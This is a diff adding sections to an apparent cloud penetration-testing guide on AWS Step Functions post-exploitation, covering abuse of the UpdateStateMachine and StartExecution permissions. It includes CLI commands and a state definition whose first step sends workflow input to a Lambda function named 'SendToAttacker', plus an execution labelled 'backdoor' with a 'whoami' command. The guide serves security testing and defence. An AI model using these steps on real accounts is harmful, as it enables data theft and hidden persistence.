diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 6a0cd5ba9..8bbb6aa52 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -71,6 +71,69 @@ aws stepfunctions untag-resource --resource-arn --tag-keys **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +### `states:UpdateStateMachine` + +This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could: + +- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS). +- **Bypass security checks**, skip validation steps, or disable error handling. +- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution. + +This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control. + +```bash +aws stepfunctions update-state-machine \ + --state-machine-arn \ + --definition file://malicious_state_definition.json \ + --role-arn arn:aws:iam:::role/ +``` + +`malicious_state_definition.json` + +```json +{ + "Comment": "Malicious State Machine - Data Exfiltration", + "StartAt": "ExfiltrateSecrets", + "States": { + "ExfiltrateSecrets": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker", + "InputPath": "$", + "ResultPath": "$.exfiltration_result", + "Next": "LegitimateStep" + }, + "LegitimateStep": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic", + "End": true + } + } +} +``` +- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states. + +--- + +### `states:StartExecution` + +With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows: + +- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them. +- **Supplying attacker-controlled input** to abuse poorly validated states. +- **Recon of business logic** by probing execution responses or failures. + +Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities. + +```bash +aws stepfunctions start-execution \ + --state-machine-arn \ + --name "backdoor-$(date +%s)" \ + --input '{"command":"whoami"}' +``` + +- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge). + + {{#include ../../../banners/hacktricks-training.md}}